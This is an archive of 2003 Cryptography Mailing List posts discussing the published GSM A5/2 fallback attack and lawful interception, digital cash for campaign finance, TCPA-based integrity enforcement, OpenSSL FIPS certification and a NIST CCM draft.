Re: Code breakers crack GSM cellphone encryption

[Dave Emery]

On Mon, Sep 08, 2003 at 09:55:41PM +, David Wagner wrote:
> Trei, Peter wrote:
> >Why the heck would a government agency have to break the GSM encryption
> >at all?
> 
> Well, one reason might be if that government agency didn't have lawful
> authorization from the country where the call takes place.
> 
> (say, SIGINT on GSM calls made in Libya)
> 
Just to amplify this a bit, does anyone seriously think the
NSA's satellite and embassy based cellphone interception capability is
primarily targeted against - US - GSM calls ?   Or that they can
routinely get warrants to listen in using the wired tapping
infrastructure in say Russia or France or Iran ?

And for that matter would you want the US government to grant
the Mossad or GCHQ or other allied spy agencies the right to ask for and
use CALEA wiretaps within the US on targets of interest only to THEM who
might well be law abiding US citizens minding their own business (at
least more or less) and not subject to legal US wiretaps ?

It is true that POLICE (eg law enforcement) wiretaps can be
mostly done with CALEA gear (and should be to ensure they aren't done
when not authorized by a suitable warrant), but national security and
intelligence wiretaps are a completely different kettle of fish,
particularly overseas.

And this says nothing at all about the need for tactical
military wiretaps on GSM systems under battlefield conditions when
soldiers lives may depend on determining what the enemy is saying over
cellphones used to direct attacks against friendly forces.


-- 
   Dave Emery N1PRE,  [EMAIL PROTECTED]  DIE Consulting, Weston, Mass 02493


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Digital cash and campaign finance reform

[Bill Stewart]

Steve - The whole thing is a crock, and the problems aren't technical.
None of the proposed users of the system have any desire to use it,
except perhaps as a front for other activities,
and the people who'd want them to make them use it are just meddlers.
It's funny how any time you bring up the First Amendment
in the context of tobacco advertising or internet pornography,
they say "Oh, no, it's not about that, it's about *political* speech",
but if you bring it up in the context of actual political speech,
well then, oh, no, the First Amendment is about not arresting
ranters on soapboxes in the park, or letting people print newspapers
as long as there's official identifying information about the printer,
but it's *certainly* not about actually letting people fund *electoral*
speech, because elections are *way* too important to let unapproved
members of the *public* influence the outcomes
The couple of papers that Michael Froomkin referenced are
pretty much the canonical references to the approach you're talking about,
but just because there are academics proposing it doesn't mean
it isn't still a total crock.
Now, if you're talking about *real* campaign finance reform,
as in permitting people to engage in free speech even if it requires
money to transmit that speech to their intended recipients,
fully anonymous digital cash is useful for that, in the obvious ways,
and payer-anonymous payee-disclosing digital cash has its uses as well,
if you like to be able to trace the people you're paying,
and anonymous and pseudonymous publishing are also obviously useful,
and then of course there's Blacknet if you want the real info on candidates.
You don't need 100% technical guarantees of anonymity for most political 
work; the public can usually guess that "Paid for by Californians for 
Motherhood and Apple Pie" is probably the prison guards' union, or the major 
opponent of the candidate that the negative TV ad was about, or whatever,
but unless there's a lawsuit or actual investigative reporter, nobody's going 
to bother tracking them down.

Unfortunately, softmoney.com got snapped up a few years ago;
I'd been planning to set it up as a site for donating your two cents to
John McCain, when he was ranting about banning it.
"paid for by Californians Against Bogus Campaign Financing Regulations,
John Doe #238, Treasurer"


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

RE: Code breakers crack GSM cellphone encryption

[David Honig]

At 05:04 PM 9/8/03 -0400, Trei, Peter wrote:
>Why the heck would a government agency have to break the GSM encryption
>at all? The encryption is only on the airlink, and all GSM calls travel
>through 
>the POTS land line system in the clear, where they are subject to 
>warranted wiretaps.
>
>Breaking GSM is only of useful if you have no access to the landline
>portion of the system.

You forget that some regimes want to listen to GSM calls
in places that they don't control.







-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

RE: Code breakers crack GSM cellphone encryption

[Vin McLellan]

At 05:04 PM 9/8/03 , Trei, Peter wrote:

Why the heck would a government agency have to break the GSM encryption at 
all? The encryption is only on the airlink, and all GSM calls travel 
through the POTS land line system in the clear, where they are subject to 
warranted wiretaps.
A government agency would be interested in breaking GSM crypto when it 
wants to target a phone call which is going through a switch and local 
wires that are under the control of another nation, or perhaps where it 
does not wish to go through whatever process might be required to gain 
legitimate or warranted access to the call's content.

A5/2 was the equivalent of 40-bit DES, presumed to be relatively weak and 
developed as an export standard.

I always thought that the important fact about the GSM secure crypto 
protocol, A5/1, was that it was reportedly chosen and adapted for this 
function by the (never identified) members of the GSM SAGE committee of 
European experts,  a multi-national group of industrial and government 
representatives.

I always presumed the SAGE group had a common interest in unwarranted 
access -- to (A5/1-secured) calls in Europe, as well as (A5/2) calls 
elsewhere -- which, for the various national security agencies involved, 
outweighed their individual interest in providing security to their 
respective citizenry.

As I recall, COMP128 came from German sources, and A5/1 was adapted from a 
French naval cipher.


Breaking GSM is only of useful if you have no access to the landline 
portion of the system.
That's right, of course.

Crypto aside, I was wondered if it might be somehow easier (legally, 
technically, procedurally) to attack the radio link of a roving GSM call -- 
even given the rapid pace of hand-off from one tower to another, as a 
mobile caller rapidly passes through several small microcell territories -- 
than would be to recover that call by tracking it through a large number of 
successive connections to the land-line telecom GSM switches.  A friend was 
telling me that he switches from one microcell to another every couple 
hundred yards in some communities.

Anyone know?

Suerte,

_Vin
-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: fyi: bear/enforcer open-source TCPA project

[bear]

On Mon, 8 Sep 2003, Sean Smith wrote:

>How can you verify that a remote computer is the "real thing, doing
>the right thing?"

You cannot.

>In contrast, this code is part of our ongoing effort to use open
>source and TCPA to turn ordinary computers into "virtual" secure
>coprocessors---more powerful but less secure than their high-assurance
>cousins.

The correct security approach is to never give a remote machine
any data that you don't want an untrusted machine to have. Anything
short of that *will* be cracked.

Bear

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Digital cash and campaign finance reform

[Joseph Ashwood]

- Original Message - 
From: "Steve Schear" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
[anonymous funding of politicians]
> Comments?

Simple attack: Bob talks to soon to be bought politician. "Tomorrow you'll
recieve a donation of $50k, you'll know where it came from."
Next day, buyer makes 500 $100 donations (remember you can't link him to any
transaction), 50k arrives through the mix. Politician knows where it came
from, but no one can prove it.

By implementing this we'll see a backwards trend. It will be harder to prove
the buyout (actually impossible), but the involved parties will know exactly
who did the paying. Right now you can actually see a similar usage in the
Bustamante (spelling?) campaign in the California Recall Election, the
Native Americans donated $2M to him in spite of a limit of ~22k by donating
from several people. Same method only now we know who did the paying.
Joe

Trust Laboratories
Changing Software Development
http://www.trustlaboratories.com


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Is cryptography where security took the wrong branch?

[Joseph Ashwood]

- Original Message - 
From: "Ian Grigg" <[EMAIL PROTECTED]>
Sent: Sunday, September 07, 2003 12:01 AM
Subject: Re: Is cryptography where security took the wrong branch?

> That's easy to see, in that if SSL was oriented
> to credit cards, why did they do SET?  (And,
> SHTTP seems much closer to that mission, on a
> quick reading, at least.)

Actually they do target very different aspects. SET, 3D-Secure, and any
other similar have a different target then SSL. To understand this it is
important to realize that instead of the usual view of two-party
transactions, credit card transactions actually take 3 parties; Issuer,
Seller, and Buyer. SSL covers the Seller-Buyer communication, and can also
be applied to the Seller-Issuer communication, but on a transaction basis it
offers nothing for the Issuer-Buyer (the important one for minimizing costs
for the Issuer).

SET/3D-Secure/etc address this through various means but the end target is
to create a pseudo-Buyer-Issuer link, through the Seller. This allows the
Issuer to minimize costs (less chance of having to make a call) and because
it is behind the scenes technology has no reason to be accompanied by a
reduction in fees (and actually because of the reduced likelihood of buyer
fraud, it may be possible to charge the seller _more_).

In the end SSL and SET/3D-Secure/etc target entirely different portions of
the problem (the former targets seller fraud against the buyer, latter
seller against issuer). Both of these are important portions, of course the
real upside of SET/3D-Secure/etc is that the seller doesn't have a choice,
and the fees in accordance with the "fraud-reduction" may very well increase
the costs to the seller, the buyer costs of course stay the same. End
result: lower fraud, increased fees->higher profit margins.

However, if it meets expectations, it is entirely possible that all
legitimate parties (non-fraud entities) will see improved profits (seller
has reduced fraud and charge-backs, buyer less likelihood of the $50
penalty, issuer higher fees). Will it meet those expectations? I have no
idea.
Joe

Trust Laboratories
Changing Software Development
http://www.trustlaboratories.com


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

RE: Code breakers crack GSM cellphone encryption

[Steve Schear]

At 05:04 PM 9/8/2003 -0400, Trei, Peter wrote:
> David Honig[SMTP:[EMAIL PROTECTED] wrote:
>
> At 02:37 AM 9/9/03 +1000, Greg Rose wrote:
>
> >much more than a cellphone (without subsidies). Patenting the attack
> >prevents the production of the "radio shack (tm) gsm scanner", so that it
>
> >at least requires serious attackers, not idle retirees or jealous
> teenagers.
>
Why the heck would a government agency have to break the GSM encryption
at all? The encryption is only on the airlink, and all GSM calls travel
through
the POTS land line system in the clear, where they are subject to
warranted wiretaps.
Breaking GSM is only of useful if you have no access to the landline
portion of the system.
LE agencies have been known to eavesdrop on cellular communications over 
the air when a wiretap might cause trouble later.  They are also thought to 
possess cellular spoofing equipment so targeted subscriber instruments can 
be captured by mobile "rouge" cell sites for fun stuff (I seem to recall 
Harris Communications made these).

steve

A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
by judges and demagogue statesmen.
- Steve Schear 

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[David Wagner]

Trei, Peter wrote:
>Why the heck would a government agency have to break the GSM encryption
>at all?

Well, one reason might be if that government agency didn't have lawful
authorization from the country where the call takes place.

(say, SIGINT on GSM calls made in Libya)

Another might be if the government agency did not want to disclose the
presence of the eavesdropping to the telephone company that is carrying
the calls.

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

fyi: bear/enforcer open-source TCPA project

[Sean Smith]

The Bear/Enforcer Project
Dartmouth College

http://enforcer.sourceforge.net
http://www.cs.dartmouth.edu/~sws/abstracts/msmw03.shtml

How can you verify that a remote computer is the "real thing, doing
the right thing?"  High-end secure coprocessors are expensive and
computationally limited; lower-end desktop enhancements like TCPA and
the former Palladium have been mainly limited to Windows and
proprietary development.

In contrast, this code is part of our ongoing effort to use open
source and TCPA to turn ordinary computers into "virtual" secure
coprocessors---more powerful but less secure than their high-assurance
cousins.

Our current alpha release includes the Linux Enforcer Module, a TCPA
enabled LILO, and a user-level TCPA library.  All source is available
from the SourceForge site.

The Linux Enforcer Module is a Linux Security Module designed to help
improve integrity of a computer running Linux.  The Enforcer provides a
subset of Tripwire-like functionality.  It runs continuously and as
each protected file is opened its SHA1 is calculated and compared to a
previously stored value.

The Enforcer is designed to integrate with TCPA hardware to provide a
secure boot when booted with a TCPA enabled boot loader.  TCPA
hardware can protect secrets and other sensitive data (for example,
the secrets for an encrypted loopback file system) and bind those
secrets to specific software.

When the Enforcer detects a modified file it can, on a per-file basis,
do any combination of the following: deny access to that file, write an
entry in the system log, panic the system, or lock the TCPA hardware.
If the TCPA hardware is locked then a reboot with a un-hacked system is
required to obtain access to the protected secret.

We developed our own TCPA support library concurrently with, but
independently from, IBM's recently announced TCPA library.  Our library
was an initial component of the Enforcer project.  However, our
in-kernel TCPA support and the enforcer-seal tool are derived from
IBM's TCPA code because of its ease of adaptation for in-kernel use.
We plan to use our more complete library for user-level applications.
(IBM's TCPA code and documentation is available from
.)

For more information on our project, see Dartmouth College Technical
Report TR2003-471 available from


Or contact Omen Wild at the Dartmouth PKI Lab: 
Omen Wild <[EMAIL PROTECTED]>



-- 
Sean W. Smith, Ph.D. [EMAIL PROTECTED]   
http://www.cs.dartmouth.edu/~sws/   (has ssl link to pgp key)
Department of Computer Science, Dartmouth College, Hanover NH USA




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[David Wagner]

John Doe Number Two  wrote:
>It's nice to see someone 'discovering' what Lucky Green already figured-out
>years ago.  I wonder if they'll cut him a check.

No, no, no!  This is new work, novel and different from what was
previously known.  In my opinion, it is an outstanding piece of research.

Barkan, Biham, and Keller establish two major results:

1. A5/2 can be cracked in real-time using a passive ciphertext only
attack, due to the use of error-correcting coding before encryption.

2. All other GSM calls (including those encoded using A5/1 and A5/3) can
be cracked using an active attack.  This attack exploits a protocol flaw:
the session key derivation process does not depend on which encryption
algorithm was selected, hence one can mount an attack on A5/2, learn
the A5/2 key, and this will be the same key used for A5/1 or A5/3 calls.

(they also make other relevant observations, but the above two are
probably the most significant discoveries)

Their attacks permit eavesdropping as well as billing fraud.

See their paper at CRYPTO 2003 for more details.  I am disappointed that
you seem to be criticizing their work before even reading their paper.
I encourage you to read the paper -- it really is interesting.

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[Bill Stewart]

Trei, Peter wrote:
Why the heck would a government agency have to break the GSM encryption
at all? The encryption is only on the airlink, 
> and all GSM calls travel through the POTS land line system in the clear,
> where they are subject to warranted wiretaps.
Breaking GSM is only of useful if you have no access to the landline
portion of the system.
Some governments are more concerned about using warrants
than others are.  Sometimes the ones that are concerned about them
also have police agencies that like to avoid using them.
Some phone companies are pickier about paperwork than others.
Some phone companies are faster about responding than others.
Having governments that are officially less concerned about warrants
is often correlated with having monopoly phone companies,
which is often correlated with slow bureaucratic response -
they may be extremely happy to help out the police,
but that doesn't mean it doesn't take 18 steps to accomplish it.
Landline-based wiretaps work best if you know the phone number;
over-the-air systems can be more flexible about picking up
any phone nearby, so if you see your target pick up a phone,
but don't know its phone number, they're more convenient.
And in landline-tapping environments, clever law-evaders
can usually acquire the equipment to keep switching phones.


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[Ian Grigg]

"Trei, Peter" wrote:

> Why the heck would a government agency have to break the GSM encryption
> at all?

Once upon a time, it used to be the favourite
sport of spy agencies to listen in on the
activities of other countries.  In that case,
access to the radio waves was much more juicy
than access to the POTS.

I've not heard anything explicitly on this,
but I'd expect satellites to be able to pick
up GSM calls.  (One of the things I have heard
is that the Chinese sold fibre networking to
Iraq, and the Russians sold special phones
with better crypto.  Don't know how true any
of that is.)

Also, the patent issue will work very well in
countries where there are laws against hacking
and cracking and so forth.  Rather than have
such laws subject to challenge in the supreme
court, a perp can be hit with both patent
infringement and illegal digital entry.  The
chances that anyone can defeat both of those
are slim.

(OTOH, I wonder if it is possible to patent or
licence something that depends on an illegal
act?)


iang

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

[Tolga Acar]

Thor Lancelot Simon wrote:

On Mon, Sep 08, 2003 at 10:49:02AM -0600, Tolga Acar wrote:
 

On a second thought, that there is no key management algorithm 
certified, how would one set up a SSL connection in FIPS mode?

It seems to me that, it is not possible to have a FIPS 140 certified 
SSL/TLS session using the OpenSSL's certification.
   

SSL's not certifiable, period.
 

I realize that, FIPS 140 addresses crypto modules with cryptographic 
algorithms, not protocols like SSL.
Although in "cryptomodule" terms "SSL's not certifiable" is not 
necessarily a correct claim. You can certainly certify one big module 
including cryptography, including the entire SSL protocol for FIPS 140. 
That would be somewhat bizzare, though.
But, that's not my point. The questions was, how would one claim that he 
is using FIPS certified cryptography *under* OpenSSL, if the crypto 
layer does not have a FIPS certified key management (read RSA) algorithm?

TLS has been held to be certifiable, and products using TLS have been
certified.  However, it's necessary to disable any use of MD5 in the
certificate validation path.  When I had a version of OpenSSL certified
for use in a product at my former employer, I had to whack the OpenSSL
source to throw an error if in FIPS mode and any part of the certificate
validation path called the MD5 functions.  Perhaps this has been done
in the version currently undergoing certification.  You'll also need
Yeah, been there.
I think my current company (Novell) suggested that, not sure what happened.
certificates that use SHA1 as the signing algorithm, which some public
CAs cannot provide (though most can, and will if the certificate request
itself uses SHA1 as the signing algorithm).
Well, that is sort of my point.
SHA1 is not a signature algorithm, sha1-with-rsa is, and that RSA is not 
a certified algorithm in OpenSSL's FIPS 140 certification,  
sha1-with-rsa isn't, either.
Perhaps, my understanding of the OpenSSL FIPS 140 certification is not 
entirely accurate.

The use of MD5 in the TLS protocol itself is okay, because it is always
used in combination with SHA1 in the PRF.  We got explicit guidance from
NIST on this issue.
Yes, but I am addressing signature generation and verification, and more 
importantly key exchange: encrypting the PMS and such.

Thor

- Tolga



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

RE: Code breakers crack GSM cellphone encryption

[Trei, Peter]

> David Honig[SMTP:[EMAIL PROTECTED] wrote:
> 
> At 02:37 AM 9/9/03 +1000, Greg Rose wrote:
> >At 05:18 PM 9/7/2003 -0700, David Honig wrote:
> >>"Laughing my ass off."  Since when do governments care about patents?
> >>How would this help/harm them from exploiting it?   Not that
> >>high-end LEOs haven't already had this capacity ---Biham et al
> >>are only the first *open* researchers to reveal this.
> >
> >Actually, patenting the method isn't nearly as silly as it sounds.
> Produced 
> >in quantity, a device to break GSM using this attack is not going to cost
> 
> >much more than a cellphone (without subsidies). Patenting the attack 
> >prevents the production of the "radio shack (tm) gsm scanner", so that it
> 
> >at least requires serious attackers, not idle retirees or jealous
> teenagers.
> 
Why the heck would a government agency have to break the GSM encryption
at all? The encryption is only on the airlink, and all GSM calls travel
through 
the POTS land line system in the clear, where they are subject to 
warranted wiretaps.

Breaking GSM is only of useful if you have no access to the landline
portion of the system.

Peter Trei



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[David Honig]

At 02:37 AM 9/9/03 +1000, Greg Rose wrote:
>At 05:18 PM 9/7/2003 -0700, David Honig wrote:
>>"Laughing my ass off."  Since when do governments care about patents?
>>How would this help/harm them from exploiting it?   Not that
>>high-end LEOs haven't already had this capacity ---Biham et al
>>are only the first *open* researchers to reveal this.
>
>Actually, patenting the method isn't nearly as silly as it sounds. Produced 
>in quantity, a device to break GSM using this attack is not going to cost 
>much more than a cellphone (without subsidies). Patenting the attack 
>prevents the production of the "radio shack (tm) gsm scanner", so that it 
>at least requires serious attackers, not idle retirees or jealous teenagers.

That sounds like a "lets make inexpensive guns illegal so only the
wealthy can have them" argument.  Or maybe a more Soviet "lets make
typewriters, xerox machines available only to those we trust".

The people who are into scanners (wealthy idle retirees, HAMS
demographically) etc. will have them, why not everyone?  In particular, and
cryptographically relevant, 
why continue a popular illusion that something is secure when its not?   

Should Blaze have published the locksmiths' master-key secret
and his detailed exploit? 
Any "idle retiree or jealous teen" can now get into places previously
(but erroneously) believed secure.  

(If some culture wants to, it can make the practice --scanning on 900Mhz,
going through a lock to trespass, exploiting a Windows security hole, 
or Biham et al's GSM attack-- illegal.   Patenting a method is not a very
good way to implement morality.  Neither will it constrain the interested
individual.)










I hope the discoverer's intent was only to make money.







-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

[Thor Lancelot Simon]

On Mon, Sep 08, 2003 at 10:49:02AM -0600, Tolga Acar wrote:
> On a second thought, that there is no key management algorithm 
> certified, how would one set up a SSL connection in FIPS mode?
> 
> It seems to me that, it is not possible to have a FIPS 140 certified 
> SSL/TLS session using the OpenSSL's certification.

SSL's not certifiable, period.

TLS has been held to be certifiable, and products using TLS have been
certified.  However, it's necessary to disable any use of MD5 in the
certificate validation path.  When I had a version of OpenSSL certified
for use in a product at my former employer, I had to whack the OpenSSL
source to throw an error if in FIPS mode and any part of the certificate
validation path called the MD5 functions.  Perhaps this has been done
in the version currently undergoing certification.  You'll also need
certificates that use SHA1 as the signing algorithm, which some public
CAs cannot provide (though most can, and will if the certificate request
itself uses SHA1 as the signing algorithm).

The use of MD5 in the TLS protocol itself is okay, because it is always
used in combination with SHA1 in the PRF.  We got explicit guidance from
NIST on this issue.

Thor

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[Steve Schear]

At 02:37 AM 9/9/2003 +1000, Greg Rose wrote:
At 05:18 PM 9/7/2003 -0700, David Honig wrote:
>A copy of the research was sent to GSM authorities in order to correct the
>problem, and the method is being patented so that in future it can be used
>by the law enforcement agencies.
"Laughing my ass off."  Since when do governments care about patents?
How would this help/harm them from exploiting it?   Not that
high-end LEOs haven't already had this capacity ---Biham et al
are only the first *open* researchers to reveal this.
Actually, patenting the method isn't nearly as silly as it sounds. 
Produced in quantity, a device to break GSM using this attack is not going 
to cost much more than a cellphone (without subsidies). Patenting the 
attack prevents the production of the "radio shack (tm) gsm scanner", so 
that it at least requires serious attackers, not idle retirees or jealous 
teenagers.
Not if they can type GNURadio into Google.

steve

A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
by judges and demagogue statesmen.
- Steve Schear 

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Digital cash and campaign finance reform

[Ian Grigg]

Steve Schear wrote:

> By combining a mandated digital cash system for contributions, a cap on the
> size of each individual contribution (perhaps as small as $100), randomized
> delays (perhaps up to a few weeks) in the "posting" of each transaction to
> the account of the counter party, it could create mix conditions which
> would thwart the ability of contributors to easily convince candidates and
> parties that they were the source of particular funds and therefore
> entitled to special treatment.

How would you audit such a system?  I'm not that up
on political cash, but I would have expected that there
would be a need to figure out where money was coming
from, by some interested third party at least.

Also there would be a need to prove that the funds
were getting there, otherwise, I'd be the first to
jump in there and run the mix.  Or, the mint.


iang

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[Anton Stiglic]

- Original Message - 
From: "Greg Rose" <[EMAIL PROTECTED]>
To: "Anton Stiglic" <[EMAIL PROTECTED]>
Cc: "John Doe Number Two" <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Monday, September 08, 2003 1:39 PM
Subject: Re: Code breakers crack GSM cellphone encryption


> At 11:43 AM 9/8/2003 -0400, Anton Stiglic wrote:
> >I think this is different however.  The recent attack focused on the A5/3
> >encryption algorithm, while the work of Lucky, Briceno, Goldberg, Wagner,
> >Biryukov, Shamir (and others?) was on A5/1 and A5/2 (and other crypto
> >algorithms of GSM, such as COMP128, ...).
>
> No, that's not right. The attack *avoids* A5/3, by making the terminal end
> of the call fall back to A5/2, solving for the key in real time, then
> continuing to use the same key with A5/3.

That`s what I meant to say but did not use the right words to say.
The attack does however seem novel.
I haven`t seen the paper on the web yet (all I know is that it was
presented at Crypto 03 which I did not attend), I`m anxious to get my hands
on it.

--Anton


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Digital cash and campaign finance reform

[Michael Froomkin - U.Miami School of Law]

http://papers.ssrn.com/sol3/papers.cfm?abstract_id=60331

http://papers.ssrn.com/sol3/papers.cfm?abstract_id=272787

http://www.cfp2000.org/papers/franklin.pdf

http://www.yale.edu/yup/books/092628.htm




On Mon, 8 Sep 2003, Steve Schear wrote:

> Everyone knows that money is the life blood of politics.  The topic of 
> campaign finance reform in the U.S. has been on and off the front burner of 
> the major media, for decades.  Although the ability of citizens and 
> corporations to support the candidates and parties of their choice can be a 
> positive political force, the ability of political contributors to buy 
> access and influence legislation is probably the major source of 
> governmental corruption.  Despite some, apparently, honest efforts at 
> limiting these legal payoffs there has been little real progress.  The 
> challenge is to encourage "neutral" campaign contributions.  Perhaps 
> technology could lend a hand.
> 
> One of the features of Chaimian digital cash is unlinkability.  Normally, 
> this has been viewed from the perspective of the payer and payee not 
> wishing to be linked to a transaction.  But it also follows that that the 
> payee can be prevented from learning the identity of the payee even if they 
> wished.  Since the final payee in politics is either the candidate or the 
> party, this lack of knowledge could make it much more difficult for the 
> money to be involved in influence peddling and quid pro quo back room deals.
> 
> By combining a mandated digital cash system for contributions, a cap on the 
> size of each individual contribution (perhaps as small as $100), randomized 
> delays (perhaps up to a few weeks) in the "posting" of each transaction to 
> the account of the counter party, it could create mix conditions which 
> would thwart the ability of contributors to easily convince candidates and 
> parties that they were the source of particular funds and therefore 
> entitled to special treatment.
> 
> Comments?
> 
> steve
> 
> 
> A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
> by judges and demagogue statesmen.
> - Steve Schear 
> 
> 
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
> 

-- 
Please visit http://www.icannwatch.org
A. Michael Froomkin   |Professor of Law|   [EMAIL PROTECTED]
U. Miami School of Law, P.O. Box 248087, Coral Gables, FL 33124 USA
+1 (305) 284-4285  |  +1 (305) 284-6506 (fax)  |  http://www.law.tm
  -->It's very hot here.<--


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

The Pure Crypto Project is released into the public domain

[Ralf Senderek]

-BEGIN PURE-CRYPTO SIGNED MESSAGE-
The development of the Pure Crypto Project has now finished
and the source code is finally released into the public domain.

 http://senderek.de/pcp/release

There is a detailed explanation of the security mechanisms and
the background of PCP in

http://senderek.de/security/pcp-protection.html

I'd like to thank everyone who had supported the development
with constructive criticism and helpful hints.

Ralf Senderek



-BEGIN PURE-CRYPTO SIGNATURE-
Hash: SDLH  *** based on modular exponentiation and RSA alone ***

Ralf Senderek, Wassenberg PCP signingkey 2003 <[EMAIL PROTECTED]>
25958032129854687932657359023881789067615223206769084549252083817701673635916478066451442739272409695432768892327091119955449106519210830940788017364200647426776939035963437924650466140653374164639095531127457251096969368134246401229854317278214790952108232304719334951046143931853036507848781896094422733831171511446825977175759419953334942627329020239718812579256503089309028102255938929278430717387498628586439358045328606841270655376672619190792218866509905138949190124291282590808234947292681044889977767097191953045774717004560559416349715717406817521786793391297428420236953949886297123601451
-END PURE-CRYPTO SIGNATURE-


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

ENC: Announcing release of DRAFT SP 800-38C - Recommendation for Block Cipher Modes of Operation the CCM Mode for Authentication and Confidentiality

[Mads Rasmussen]

In the draft Special Publication 800-38C, Recommendation for Block
Cipher Modes of Operation: the CCM Mode for Authentication and
Confidentiality, the CCM mode of the Advanced Encryption Standard (AES)
algorithm is specified for the protection of sensitive, unclassified
data. The CCM algorithm combines the counter (CTR) mode for
confidentiality with the cipher block chaining-message authentication
code (CBC-MAC) technique for authentication. Further information on the
development of block cipher modes of operation is available at the modes
home page http://nist.gov/modes/.

NIST welcomes public comments on the draft until October 20, 2003;
comments may be sent to [EMAIL PROTECTED]

Please go to the CSRC Draft publications page to view this document:
http://csrc.nist.gov/publications/drafts.html



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[Greg Rose]

At 11:43 AM 9/8/2003 -0400, Anton Stiglic wrote:
I think this is different however.  The recent attack focused on the A5/3
encryption algorithm, while the work of Lucky, Briceno, Goldberg, Wagner,
Biryukov, Shamir (and others?) was on A5/1 and A5/2 (and other crypto
algorithms of GSM, such as COMP128, ...).
No, that's not right. The attack *avoids* A5/3, by making the terminal end 
of the call fall back to A5/2, solving for the key in real time, then 
continuing to use the same key with A5/3.

A5/3 (based on Kasumi, and essentially the same as the WCDMA algorithm 
UEA1) is not in any way compromised by this attack.

Greg.

Greg Rose   INTERNET: [EMAIL PROTECTED]
Qualcomm Australia  VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199
Level 3, 230 Victoria Road,http://people.qualcomm.com/ggr/
Gladesville NSW 2111232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C
-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Digital cash and campaign finance reform

[Steve Schear]

Everyone knows that money is the life blood of politics.  The topic of 
campaign finance reform in the U.S. has been on and off the front burner of 
the major media, for decades.  Although the ability of citizens and 
corporations to support the candidates and parties of their choice can be a 
positive political force, the ability of political contributors to buy 
access and influence legislation is probably the major source of 
governmental corruption.  Despite some, apparently, honest efforts at 
limiting these legal payoffs there has been little real progress.  The 
challenge is to encourage "neutral" campaign contributions.  Perhaps 
technology could lend a hand.

One of the features of Chaimian digital cash is unlinkability.  Normally, 
this has been viewed from the perspective of the payer and payee not 
wishing to be linked to a transaction.  But it also follows that that the 
payee can be prevented from learning the identity of the payee even if they 
wished.  Since the final payee in politics is either the candidate or the 
party, this lack of knowledge could make it much more difficult for the 
money to be involved in influence peddling and quid pro quo back room deals.

By combining a mandated digital cash system for contributions, a cap on the 
size of each individual contribution (perhaps as small as $100), randomized 
delays (perhaps up to a few weeks) in the "posting" of each transaction to 
the account of the counter party, it could create mix conditions which 
would thwart the ability of contributors to easily convince candidates and 
parties that they were the source of particular funds and therefore 
entitled to special treatment.

Comments?

steve

A foolish Constitutional inconsistency is the hobgoblin of freedom, adored 
by judges and demagogue statesmen.
- Steve Schear 

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: OpenSSL *source* to get FIPS 140-2 Level 1 certification

[Tolga Acar]

On a second thought, that there is no key management algorithm 
certified, how would one set up a SSL connection in FIPS mode?

It seems to me that, it is not possible to have a FIPS 140 certified 
SSL/TLS session using the OpenSSL's certification.

- Tolga

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Re: Code breakers crack GSM cellphone encryption

[Greg Rose]

At 05:18 PM 9/7/2003 -0700, David Honig wrote:
>A copy of the research was sent to GSM authorities in order to correct the
